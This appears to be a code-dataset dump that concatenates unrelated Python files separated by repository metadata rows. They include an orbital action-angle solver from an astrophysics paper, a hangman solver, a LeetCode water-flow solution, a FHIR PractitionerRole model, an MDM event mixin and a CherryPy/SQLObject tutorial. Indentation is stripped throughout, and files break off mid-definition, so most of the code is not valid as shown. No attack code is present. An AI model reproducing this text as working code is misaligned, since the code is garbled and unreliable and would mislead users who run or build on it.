from . import toy_potentials as toy
from . import test_potentials as pot
from . import solver
from . import visualize_surfaces as vs
from .solver import unroll_angles as ua
def choose_NT(N_max,iffreq=True):
""" calculates number of time samples required to constrain N_max modes
--- equation (21) from Sanders & Binney (2014) """
if(iffreq):
return max(200,9*N_max**3/4)
else:
return max(100,N_max**3/2)
def check_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the toy angle solution against the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
a[i].plot(toy_aa.T[i+3],'.')
size = len(ang[6:])/3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot((ang[i]+ang[i+3]*timeseries-2.*AA) % (2.*np.pi),'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def check_target_angle_solution(ang,n_vec,toy_aa,timeseries):
""" Plots the angle solution and the toy angles ---
Takes true angles and frequencies ang,
the Fourier vectors n_vec,
the toy action-angles toy_aa
and the timeseries """
f,a=plt.subplots(3,1)
for i in range(3):
# a[i].plot(toy_aa.T[i+3],'.')
size = len(ang[6:])/3
AA = np.array([np.sum(ang[6+i*size:6+(i+1)*size]*np.sin(np.sum(n_vec*K,axis=1))) for K in toy_aa.T[3:].T])
a[i].plot(((toy_aa.T[i+3]+2.*AA) % (2.*np.pi))-(ang[i]+timeseries*ang[i+3]) % (2.*np.pi),'.')
a[i].plot(toy_aa.T[i+3],'.')
a[i].set_ylabel(r'$\theta$'+str(i+1))
a[2].set_xlabel(r'$t$')
plt.show()
def eval_mean_error_functions(act,ang,n_vec,toy_aa,timeseries,withplot=False):
""" Calculates sqrt(mean(E)) and sqrt(mean(F)) """
Err = np.zeros(6)
NT = len(timeseries)
size = len(ang[6:])/3
UA = ua(toy_aa.T[3:].T,np.ones(3))
fig,axis=None,None
if(withplot):
fig,axis=plt.subplots(3,2)
plt.subplots_adjust(wspace=0.3)
for K in range(3):
ErrJ = np.array([(i[K]-act[K]-2.*np.sum(n_vec.T[K]*act[3:]*np.cos(np.dot(n_vec,i[3:]))))**2 for i in toy_aa])
Err[K] = np.sum(ErrJ)
ErrT = np.array(((ang[K]+timeseries*ang[K+3]-UA.T[K]-2.*np.array([np.sum(ang[6+K*size:6+(K+1)*size]*np.sin(np.sum(n_vec*i,axis=1))) for i in toy_aa.T[3:].T])))**2)
Err[K+3] = np.sum(ErrT)
if(withplot):
axis[K][0].plot(ErrJ,'.')
axis[K][0].set_ylabel(r'$E$'+str(K+1))
axis[K][1].plot(ErrT,'.')
axis[K][1].set_ylabel(r'$F$'+str(K+1))
if(withplot):
for i in range(3):
axis[i][0].set_xlabel(r'$t$')
axis[i][1].set_xlabel(r'$t$')
plt.show()
EJ = np.sqrt(Err[:3]/NT)
ET = np.sqrt(Err[3:]/NT)
return np.array([EJ,ET])
def box_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for box orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
"""
if(ifprint):
print("\n=====\nUsing triaxial harmonic toy potential")
t = time.time()
# Find best toy parameters
omega = toy.findbestparams_ho(results)
if(ifprint):
print("Best omega "+str(omega)+" found in "+str(time.time()-t)+" seconds")
# Now find toy actions and angles
AA = np.array([toy.angact_ho(i,omega) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix)
if act==None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
np.savetxt("GF.Sn_box",np.vstack((act[1].T,act[0][3:])).T)
ang = solver.angle_solver(AA,times,N_matrix,np.ones(3))
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, omega
def loop_actions(results, times, N_matrix, ifprint):
"""
Finds actions, angles and frequencies for loop orbit.
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) -- explained in find_actions() below.
results must be oriented such that circulation is about the z-axis
"""
if(ifprint):
print("\n=====\nUsing isochrone toy potential")
t = time.time()
# First find the best set of toy parameters
params = toy.findbestparams_iso(results)
if(params[0]!=params[0]):
params = np.array([10.,10.])
if(ifprint):
print("Best params "+str(params)+" found in "+str(time.time()-t)+" seconds")
# Now find the toy angles and actions in this potential
AA = np.array([toy.angact_iso(i,params) for i in results])
AA = AA[~np.isnan(AA).any(1)]
if(len(AA)==0):
return
t = time.time()
act = solver.solver(AA, N_matrix,symNx = 1)
if act==None:
return
if(ifprint):
print("Action solution found for N_max = "+str(N_matrix)+", size "+str(len(act[0]))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Store Sn
np.savetxt("GF.Sn_loop",np.vstack((act[1].T,act[0][3:])).T)
# Find angles
sign = np.array([1.,np.sign(results[0][0]*results[0][4]-results[0][1]*results[0][3]),1.])
ang = solver.angle_solver(AA,times,N_matrix,sign,symNx = 1)
if(ifprint):
print("Angle solution found for N_max = "+str(N_matrix)+", size "+str(len(ang))+" symmetric matrix in "+str(time.time()-t)+" seconds")
# Just some checks
if(len(ang)>len(AA)):
print("More unknowns than equations")
return act[0], ang, act[1], AA, params
def angmom(x):
""" returns angular momentum vector of phase-space point x"""
return np.array([x[1]*x[5]-x[2]*x[4],x[2]*x[3]-x[0]*x[5],x[0]*x[4]-x[1]*x[3]])
def assess_angmom(X):
"""
Checks for change of sign in each component of the angular momentum.
Returns an array with ith entry 1 if no sign change in i component
and 0 if sign change.
Box = (0,0,0)
S.A loop = (0,0,1)
L.A loop = (1,0,0)
"""
L=angmom(X[0])
loop = np.array([1,1,1])
for i in X[1:]:
L0 = angmom(i)
if(L0[0]*L[0]<0.):
loop[0] = 0
if(L0[1]*L[1]<0.):
loop[1] = 0
if(L0[2]*L[2]<0.):
loop[2] = 0
return loop
def flip_coords(X,loop):
""" Align circulation with z-axis """
if(loop[0]==1):
return np.array(map(lambda i: np.array([i[2],i[1],i[0],i[5],i[4],i[3]]),X))
else:
return X
def find_actions(results, t, N_matrix=8, use_box=False, ifloop=False, ifprint = True):
"""
Main routine:
Takes a series of phase-space points from an orbit integration at times t and returns
L = (act,ang,n_vec,toy_aa, pars) where act is the actions, ang the initial angles and
frequencies, n_vec the n vectors of the Fourier modes, toy_aa the toy action-angle
coords, and pars are the toy potential parameters
N_matrix sets the maximum |n| of the Fourier modes used,
use_box forces the routine to use the triaxial harmonic oscillator as the toy potential,
ifloop=True returns orbit classification,
ifprint=True prints progress messages.
"""
# Determine orbit class
loop = assess_angmom(results)
arethereloops = np.any(loop>0)
if(arethereloops and not use_box):
L = loop_actions(flip_coords(results,loop),t,N_matrix, ifprint)
if(L==None):
if(ifprint):
print("Failed to find actions for this orbit")
return
# Used for switching J_2 and J_3 for long-axis loop orbits
# This is so the orbit classes form a continuous plane in action space
# if(loop[0]):
# L[0][1],L[0][2]=L[0][2],L[0][1]
# L[1][1],L[1][2]=L[1][2],L[1][1]
# L[1][4],L[1][5]=L[1][5],L[1][4]
# L[3].T[1],L[3].T[2]=L[3].T[2],L[3].T[1]
else:
L = box_actions(results,t,N_matrix, ifprint)
if(L==None):
if(ifprint):
print("Failed to find actions for this orbit")
return
if(ifloop):
return L,loop
else:
return L
###################
# Plotting tests #
###################
from .solver import check_each_direction as ced
def plot_Sn_timesamples(PSP):
""" Plots Fig. 5 from Sanders & Binney (2014) """
TT = pot.stackel_triax()
f,a = plt.subplots(2,1,figsize=[3.32,3.6])
plt.subplots_adjust(hspace=0.,top=0.8)
LowestPeriod = 2.*np.pi/38.86564386
Times = np.array([2.,4.,8.,12.])
Sr = np.arange(2,14,2)
# Loop over length of integration window
for i,P,C in zip(Times,['.','s','D','^'],['k','r','b','g']):
diffact = np.zeros((len(Sr),3))
difffreq = np.zeros((len(Sr),3))
MAXGAPS = np.array([])
# Loop over N_max
for k,j in enumerate(Sr):
NT = choose_NT(j)
timeseries=np.linspace(0.,i*LowestPeriod,NT)
results = odeint(pot.orbit_derivs2,PSP,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
act,ang,n_vec,toy_aa, pars = find_actions(results, timeseries,N_matrix=j,ifprint=False,use_box=True)
# Check all modes
checks,maxgap = ced(n_vec,ua(toy_aa.T[3:].T,np.ones(3)))
if len(maxgap)>0:
maxgap = np.max(maxgap)
else:
maxgap = 0
diffact[k] = act[:3]/TT.action(results[0])
MAXGAPS = np.append(MAXGAPS,maxgap)
difffreq[k] = ang[3:6]/TT.freq(results[0])
size = 15
if(P=='.'):
size = 30
LW = np.array(map(lambda i: 0.5+i*0.5, MAXGAPS))
a[0].scatter(Sr,np.log10(np.abs(diffact.T[2]-1)),marker=P,s=size, color=C,facecolors="none",lw=LW,label=r'$T =\,$'+str(i)+r'$\,T_F$')
a[1].scatter(Sr,np.log10(np.abs(difffreq.T[2]-1)),marker=P,s=size, color=C,facecolors="none", lw=LW)
a[1].get_yticklabels()[-1].set_visible(False)
a[0].set_xticklabels([])
a[0].set_xlim(1,13)
a[0].set_ylabel(r"$\log_{10}|J_3^\prime/J_{3, \rm true}-1|$")
leg = a[0].legend(loc='upper center',bbox_to_anchor=(0.5,1.4),ncol=2, scatterpoints = 1)
leg.draw_frame(False)
a[1].set_xlim(1,13)
a[1].set_xlabel(r'$N_{\rm max}$')
a[1].set_ylabel(r"$\log_{10}|\Omega_3^\prime/\Omega_{3,\rm true}-1|$")
plt.savefig('Sn_T_box.pdf',bbox_inches='tight')
def plot3D_stacktriax(initial,final_t,N_MAT,file_output):
""" For producing plots from paper """
# Setup Stackel potential
TT = pot.stackel_triax()
times = choose_NT(N_MAT)
timeseries=np.linspace(0.,final_t,times)
# Integrate orbit
results = odeint(pot.orbit_derivs2,initial,timeseries,args=(TT,),rtol=1e-13,atol=1e-13)
# Find actions, angles and frequencies
(act,ang,n_vec,toy_aa, pars),loop = find_actions(results, timeseries,N_matrix=N_MAT,ifloop=True)
toy_pot = 0
if(loop[2]>0.5 or loop[0]>0.5):
toy_pot = pot.isochrone(par=np.append(pars,0.))
else:
toy_pot = pot.harmonic_oscillator(omega=pars[:3])
# Integrate initial condition in toy potential
timeseries_2=np.linspace(0.,2.*final_t,3500)
results_toy = odeint(pot.orbit_derivs2,initial,timeseries_2,args=(toy_pot,))
# and plot
f,a = plt.subplots(2,3,figsize=[3.32,5.5])
a[0,0] = plt.subplot2grid((3,2), (0, 0))
a[1,0] = plt.subplot2grid((3,2), (0, 1))
a[0,1] = plt.subplot2grid((3,2), (1, 0))
a[1,1] = plt.subplot2grid((3,2), (1, 1))
a[0,2] = plt.subplot2grid((3,2), (2, 0),colspan=2)
plt.subplots_adjust(wspace=0.5,hspace=0.45)
# xy orbit
a[0,0].plot(results.T[0],results.T[1],'k')
a[0,0].set_xlabel(r'$x/{\rm kpc}$')
a[0,0].set_ylabel(r'$y/{\rm kpc}$')
a[0,0].xaxis.set_major_locator(MaxNLocator(5))
# xz orbit
a[1,0].plot(results.T[0],results.T[2],'k')
a[1,0].set_xlabel(r'$x/{\rm kpc}$')
a[1,0].set_ylabel(r'$z/{\rm kpc}$')
a[1,0].xaxis.set_major_locator(MaxNLocator(5))
# toy orbits
a[0,0].plot(results_toy.T[0],results_toy.T[1],'r',alpha=0.2,linewidth=0.3)
a[1,0].plot(results_toy.T[0],results_toy.T[2],'r',alpha=0.2,linewidth=0.3)
# Toy actions
a[0,2].plot(Conv*timeseries,toy_aa.T[0],'k:',label='Toy action')
a[0,2].plot(Conv*timeseries,toy_aa.T[1],'r:')
a[0,2].plot(Conv*timeseries,toy_aa.T[2],'b:')
# Arrows to show approx. actions
arrow_end = a[0,2].get_xlim()[1]
arrowd = 0.08*(arrow_end-a[0,2].get_xlim()[0])
a[0,2].annotate('',(arrow_end+arrowd,act[0]),(arrow_end,act[0]),arrowprops=dict(arrowstyle='<-',color='k'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[1]),(arrow_end,act[1]),arrowprops=dict(arrowstyle='<-',color='r'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[2]),(arrow_end,act[2]),arrowprops=dict(arrowstyle='<-',color='b'),annotation_clip=False)
# True actions
a[0,2].plot(Conv*timeseries,TT.action(results[0])[0]*np.ones(len(timeseries)),'k',label='True action')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[1]*np.ones(len(timeseries)),'k')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[2]*np.ones(len(timeseries)),'k')
a[0,2].set_xlabel(r'$t/{\rm Gyr}$')
a[0,2].set_ylabel(r'$J/{\rm kpc\,km\,s}^{-1}$')
leg = a[0,2].legend(loc='upper center',bbox_to_anchor=(0.5,1.2),ncol=3, numpoints = 1)
leg.draw_frame(False)
# Toy angle coverage
a[0,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[4]/(np.pi),'k.',markersize=0.4)
a[0,1].set_xlabel(r'$\theta_1/\pi$')
a[0,1].set_ylabel(r'$\theta_2/\pi$')
a[1,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[5]/(np.pi),'k.',markersize=0.4)
a[1,1].set_xlabel(r'$\theta_1/\pi$')
a[1,1].set_ylabel(r'$\theta_3/\pi$')
plt.savefig(file_output,bbox_inches='tight')
return act
if __name__=="__main__":
BoxP = np.array([0.1,0.1,0.1,142.,140.,251.])
LoopP = np.array([10.,1.,8.,40.,152.,63.])
ResP = np.array([0.1,0.1,0.1,142.,150.,216.5])
LongP = np.array([-0.5,18.,0.5,25.,20.,-133.1])
# Short-axis Loop
LowestPeriodLoop = 2*np.pi/15.30362865
# Fig 1
loop = plot3D_stacktriax(LoopP,8*LowestPeriodLoop,6,'genfunc_3d_example_LT_Stack_Loop.pdf')
# Fig 3
vs.Sn_plots('GF.Sn_loop','loop',loop,1)
# Box
LowestPeriodBox = 2.*np.pi/38.86564386
# Fig 2
box = plot3D_stacktriax(BoxP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Box.pdf')
# Fig 4
vs.Sn_plots('GF.Sn_box','box',box,0)
# Res
LowestPeriodRes = 2.*np.pi/42.182
# Fig 5
res = plot3D_stacktriax(ResP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Res.pdf')
# vs.Sn_plots('GF.Sn_box','box',res,0)
# Long-axis loop
LowestPeriodLong = 2.*np.pi/12.3
| [
"adrian.prw@gmail.com"
] | adrian.prw@gmail.com |
8b225ee618d2c0e039ce2c2d41cf4951ba7b6028 | c1c5a8dc79cacf3b419bad77881213c5db2f80c3 | /Kattis/Hangman.py | 540add223680299e4c243eee7ae10b1621c955f5 | [] | no_license | EoinDavey/Competitive | 7ff8b6b6225814ac60c3ace659bb63190eb52420 | b2b6909b93f5c073b684477f8a4b06dac22ec678 | refs/heads/master | 2023-01-08T00:06:19.076941 | 2022-12-26T14:00:31 | 2022-12-26T14:00:31 | 67,259,478 | 17 | 1 | null | 2022-01-19T18:17:59 | 2016-09-02T22:46:26 | C++ | UTF-8 | Python | false | false | 189 | py | w = set(raw_input())
r = set()
s = raw_input()
i = 0
for c in s:
if c in w:
r.add(c)
else:
i+=1
if len(r) == len(w):
break
if i < 10:
print "WIN"
else:
print "LOSE"
| [
"eoind@vey.ie"
] | eoind@vey.ie |
05e85c0919ad2a4b88eaf3953a840091332c7133 | a0f55e31c92c31832fbe074038f07b8f8726425b | /Python/Python编程实践gwpy2-code/code/fileproc/inception_readlines.py | 1e43a6ab8998312ebdc7d1dc31948d9364a4b3e1 | [
"MIT"
] | permissive | jjc521/E-book-Collection | 7533717250395a8b81163564eef821e66bae5202 | b18bf6630bf99b7bf19b4cc4450b67887f618d31 | refs/heads/master | 2023-03-15T23:48:49.018347 | 2019-08-30T07:26:01 | 2019-08-30T07:26:01 | 206,090,622 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | with open('file_example.txt', 'r') as example_file:
lines = example_file.readlines()
print(lines)
| [
"907097904@qq.com"
] | 907097904@qq.com |
d03b9dea06bfefc925406420ce6441c7af6a6826 | 3da69696601b2b3ad7bc1285a5f0343c7eafea80 | /lc417.py | 4fde0896c49f578ad3744a0571ca5a994537d5c7 | [] | no_license | GeorgyZhou/Leetcode-Problem | ee586463a2e4e75c910c095bdc057f1be70b5c1b | d6fac85a94a7188e93d4e202e67b6485562d12bd | refs/heads/master | 2021-06-30T15:58:04.698200 | 2020-12-18T22:55:49 | 2020-12-18T22:55:49 | 66,054,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | class Solution(object):
def pacificAtlantic(self, matrix):
"""
:type matrix: List[List[int]]
:rtype: List[List[int]]
"""
import heapq
row = len(matrix)
if row == 0:
return []
col = len(matrix[0])
if col == 0:
return []
ret = []
pac = dict()
alt = dict()
heapalt = []
heappac = []
pacvisited = dict()
altvisited = dict()
for i in xrange(row):
pac[(i,0)] = 1
pacvisited[(i,0)] = 1
alt[(i,col-1)] = 1
altvisited[(i, col-1)] = 1
heapq.heappush(heapalt, (matrix[i][col-1], i, col-1))
heapq.heappush(heappac, (matrix[i][0], i, 0))
for j in xrange(1, col):
pac[(0,j)] = 1
pacvisited[(0, j)] = 1
alt[(row-1, col-1-j)] = 1
altvisited[(row-1, col-1-j)] = 1
heapq.heappush(heappac, (matrix[0][j], 0, j))
heapq.heappush(heapalt, (matrix[row-1][col-1-j], row-1, col-1-j))
while len(heappac) > 0:
height, i, j = heapq.heappop(heappac)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not pacvisited.has_key((x, y)) and height <= matrix[x][y]:
pac[(x,y)] = 1
heapq.heappush(heappac, (matrix[x][y], x, y))
pacvisited[(x,y)] = 1
while len(heapalt) > 0:
height, i, j = heapq.heappop(heapalt)
for x, y in [(i-1, j), (i+1, j), (i, j-1), (i, j+1)]:
if 0 <= x < row and 0<= y < col and not altvisited.has_key((x, y)) and height <= matrix[x][y]:
alt[(x,y)] = 1
heapq.heappush(heapalt, (matrix[x][y], x, y))
altvisited[(x,y)] = 1
for x in xrange(row):
for y in xrange(col):
if alt.has_key((x, y)) and pac.has_key((x, y)):
ret.append([x, y])
return ret
| [
"michaelchouqj@gmail.com"
] | michaelchouqj@gmail.com |
cf9536970a1d384e5d71709808001cf25fb90dc5 | 39e1e256acae3fe9be4434024d42b9bb47bdd02f | /analysis/submissions/844088c7077d499fa3533250ae504e7f_task2-2_1595958872/task2-2/main_patch.py | 9487fafad846fe1eb836cae4a61d574d42fae035 | [] | no_license | neulab/tranx-study | 9fb67b9a2181f0b362e4f97316c502eee4539b19 | e2a7089689f7f95e773e19c8f19513abe4fb8b9b | refs/heads/master | 2023-06-14T04:46:01.010892 | 2021-07-08T09:29:05 | 2021-07-08T09:29:05 | 250,357,553 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | from os import listdir
from os.path import isfile, join
from shutil import copyfile
def clean(file):
with open(file, 'r', encoding="ISO-8859-1") as f:
print(file)
return '\n'.join([line for line in f.read().strip().splitlines()]).encode('utf-8')
for fname in listdir('data/'):
fpath = join('data/', fname)
if isfile(fpath):
output_path = join('output/', fname)
if fpath.endswith('.txt'):
with open(output_path, 'wb') as out_f:
out_f.write(clean(fpath))
else:
copyfile(fpath, output_path)
| [
"frankxu2004@gmail.com"
] | frankxu2004@gmail.com |
c3f3e68e88d865e2a783eb6a940e63f3c9138e80 | be61a9f30274514857ea34297719157f1e5b8447 | /fhir/resources/practitionerrole.py | 93992fb6288c5beb51b23d862239f67f18b278e5 | [
"BSD-3-Clause"
] | permissive | jwygoda/fhir.resources | ceff3a620100d2e875136b86d3e82816c0e60a33 | 5053565570d1ca992d9971d20db813c53fd350b9 | refs/heads/master | 2021-02-05T02:59:17.436485 | 2019-07-18T10:57:33 | 2019-07-18T10:57:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,907 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/PractitionerRole) on 2019-05-13.
# 2019, SMART Health IT.
from . import domainresource
class PractitionerRole(domainresource.DomainResource):
""" Roles/organizations the practitioner is associated with.
A specific set of Roles/Locations/specialties/services that a practitioner
may perform at an organization for a period of time.
"""
resource_type = "PractitionerRole"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.active = None
""" Whether this practitioner role record is in active use.
Type `bool`. """
self.availabilityExceptions = None
""" Description of availability exceptions.
Type `str`. """
self.availableTime = None
""" Times the Service Site is available.
List of `PractitionerRoleAvailableTime` items (represented as `dict` in JSON). """
self.code = None
""" Roles which this practitioner may perform.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.endpoint = None
""" Technical endpoints providing access to services operated for the
practitioner with this role.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.healthcareService = None
""" The list of healthcare services that this worker provides for this
role's Organization/Location(s).
List of `FHIRReference` items (represented as `dict` in JSON). """
self.identifier = None
""" Business Identifiers that are specific to a role/location.
List of `Identifier` items (represented as `dict` in JSON). """
self.location = None
""" The location(s) at which this practitioner provides care.
List of `FHIRReference` items (represented as `dict` in JSON). """
self.notAvailable = None
""" Not available during this time due to provided reason.
List of `PractitionerRoleNotAvailable` items (represented as `dict` in JSON). """
self.organization = None
""" Organization where the roles are available.
Type `FHIRReference` (represented as `dict` in JSON). """
self.period = None
""" The period during which the practitioner is authorized to perform
in these role(s).
Type `Period` (represented as `dict` in JSON). """
self.practitioner = None
""" Practitioner that is able to provide the defined services for the
organization.
Type `FHIRReference` (represented as `dict` in JSON). """
self.specialty = None
""" Specific specialty of the practitioner.
List of `CodeableConcept` items (represented as `dict` in JSON). """
self.telecom = None
""" Contact details that are specific to the role/location/service.
List of `ContactPoint` items (represented as `dict` in JSON). """
super(PractitionerRole, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRole, self).elementProperties()
js.extend([
("active", "active", bool, "boolean", False, None, False),
("availabilityExceptions", "availabilityExceptions", str, "string", False, None, False),
("availableTime", "availableTime", PractitionerRoleAvailableTime, "PractitionerRoleAvailableTime", True, None, False),
("code", "code", codeableconcept.CodeableConcept, "CodeableConcept", True, None, False),
("endpoint", "endpoint", fhirreference.FHIRReference, "Reference", True, None, False),
("healthcareService", "healthcareService", fhirreference.FHIRReference, "Reference", True, None, False),
("identifier", "identifier", identifier.Identifier, "Identifier", True, None, False),
("location", "location", fhirreference.FHIRReference, "Reference", True, None, False),
("notAvailable", "notAvailable", PractitionerRoleNotAvailable, "PractitionerRoleNotAvailable", True, None, False),
("organization", "organization", fhirreference.FHIRReference, "Reference", False, None, False),
("period", "period", period.Period, "Period", False, None, False),
("practitioner", "practitioner", fhirreference.FHIRReference, "Reference", False, None, False),
("specialty", "specialty", codeableconcept.CodeableConcept, "CodeableConcept", True, None, False),
("telecom", "telecom", contactpoint.ContactPoint, "ContactPoint", True, None, False),
])
return js
from . import backboneelement
class PractitionerRoleAvailableTime(backboneelement.BackboneElement):
""" Times the Service Site is available.
A collection of times the practitioner is available or performing this role
at the location and/or healthcareservice.
"""
resource_type = "PractitionerRoleAvailableTime"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.allDay = None
""" Always available? e.g. 24 hour service.
Type `bool`. """
self.availableEndTime = None
""" Closing time of day (ignored if allDay = true).
Type `FHIRDate` (represented as `str` in JSON). """
self.availableStartTime = None
""" Opening time of day (ignored if allDay = true).
Type `FHIRDate` (represented as `str` in JSON). """
self.daysOfWeek = None
""" mon | tue | wed | thu | fri | sat | sun.
List of `str` items. """
super(PractitionerRoleAvailableTime, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRoleAvailableTime, self).elementProperties()
js.extend([
("allDay", "allDay", bool, "boolean", False, None, False),
("availableEndTime", "availableEndTime", fhirdate.FHIRDate, "time", False, None, False),
("availableStartTime", "availableStartTime", fhirdate.FHIRDate, "time", False, None, False),
("daysOfWeek", "daysOfWeek", str, "code", True, None, False),
])
return js
class PractitionerRoleNotAvailable(backboneelement.BackboneElement):
""" Not available during this time due to provided reason.
The practitioner is not available or performing this role during this
period of time due to the provided reason.
"""
resource_type = "PractitionerRoleNotAvailable"
def __init__(self, jsondict=None, strict=True):
""" Initialize all valid properties.
:raises: FHIRValidationError on validation errors, unless strict is False
:param dict jsondict: A JSON dictionary to use for initialization
:param bool strict: If True (the default), invalid variables will raise a TypeError
"""
self.description = None
""" Reason presented to the user explaining why time not available.
Type `str`. """
self.during = None
""" Service not available from this date.
Type `Period` (represented as `dict` in JSON). """
super(PractitionerRoleNotAvailable, self).__init__(jsondict=jsondict, strict=strict)
def elementProperties(self):
js = super(PractitionerRoleNotAvailable, self).elementProperties()
js.extend([
("description", "description", str, "string", False, None, True),
("during", "during", period.Period, "Period", False, None, False),
])
return js
import sys
try:
from . import codeableconcept
except ImportError:
codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
from . import contactpoint
except ImportError:
contactpoint = sys.modules[__package__ + '.contactpoint']
try:
from . import fhirdate
except ImportError:
fhirdate = sys.modules[__package__ + '.fhirdate']
try:
from . import fhirreference
except ImportError:
fhirreference = sys.modules[__package__ + '.fhirreference']
try:
from . import identifier
except ImportError:
identifier = sys.modules[__package__ + '.identifier']
try:
from . import period
except ImportError:
period = sys.modules[__package__ + '.period']
| [
"connect2nazrul@gmail.com"
] | connect2nazrul@gmail.com |
4814556209a63b3749122e9e8c239c4aabab5d69 | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/contrib/mdm/views/base.py | e87ecd36b7d41addde0cb28c75645741a6dd1b1d | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 1,481 | py | from django.core.exceptions import SuspiciousOperation
from zentral.utils.http import user_agent_and_ip_address_from_request
class PostEventMixin:
_setup_done = False
def dispatch(self, request, *args, **kwargs):
self.setup_with_request(request)
return super().dispatch(request, *args, **kwargs)
def setup_with_request(self, request):
if not self._setup_done:
self.user_agent, self.ip = user_agent_and_ip_address_from_request(request)
self.serial_number = self.udid = None
self.realm_user = None
self._setup_done = True
def post_event(self, status, **event_payload):
event_payload["status"] = status
if self.udid:
event_payload["udid"] = self.udid
if self.realm_user:
realm = self.realm_user.realm
event_payload["realm"] = {"pk": str(realm.pk),
"name": realm.name}
event_payload["realm_user"] = {"pk": str(self.realm_user.pk),
"username": self.realm_user.username}
self.event_class.post_machine_request_payloads(self.serial_number, self.user_agent, self.ip,
[event_payload])
def abort(self, reason, **event_payload):
if reason:
event_payload["reason"] = reason
self.post_event("failure", **event_payload)
raise SuspiciousOperation
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
57b0f77bec4f7eec3adf821f20ae402b5af51d66 | 2ff7e53d5e512cd762217ca54317982e07a2bb0c | /eve-8.51.857815/carbon/common/lib/cherrypy/tutorial/bonus-sqlobject.py | 28b698ecccf4841092d2c84d53dee0097cbcc5cf | [] | no_license | nanxijw/Clara-Pretty-One-Dick | 66d3d69426642b79e8fd4cc8e0bec23adeeca6d6 | 50de3488a2140343c364efc2615cf6e67f152be0 | refs/heads/master | 2021-01-19T09:25:07.555284 | 2015-02-17T21:49:33 | 2015-02-17T21:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,502 | py | #Embedded file name: carbon/common/lib/cherrypy/tutorial\bonus-sqlobject.py
"""
Bonus Tutorial: Using SQLObject
This is a silly little contacts manager application intended to
demonstrate how to use SQLObject from within a CherryPy2 project. It
also shows how to use inline Cheetah templates.
SQLObject is an Object/Relational Mapper that allows you to access
data stored in an RDBMS in a pythonic fashion. You create data objects
as Python classes and let SQLObject take care of all the nasty details.
This code depends on the latest development version (0.6+) of SQLObject.
You can get it from the SQLObject Subversion server. You can find all
necessary information at <http://www.sqlobject.org>. This code will NOT
work with the 0.5.x version advertised on their website!
This code also depends on a recent version of Cheetah. You can find
Cheetah at <http://www.cheetahtemplate.org>.
After starting this application for the first time, you will need to
access the /reset URI in order to create the database table and some
sample data. Accessing /reset again will drop and re-create the table,
so you may want to be careful. :-)
This application isn't supposed to be fool-proof, it's not even supposed
to be very GOOD. Play around with it some, browse the source code, smile.
:)
-- Hendrik Mans <hendrik@mans.de>
"""
import cherrypy
from Cheetah.Template import Template
from sqlobject import *
__connection__ = 'mysql://root:@localhost/test'
class Contact(SQLObject):
lastName = StringCol(length=50, notNone=True)
firstName = StringCol(length=50, notNone=True)
phone = StringCol(length=30, notNone=True, default='')
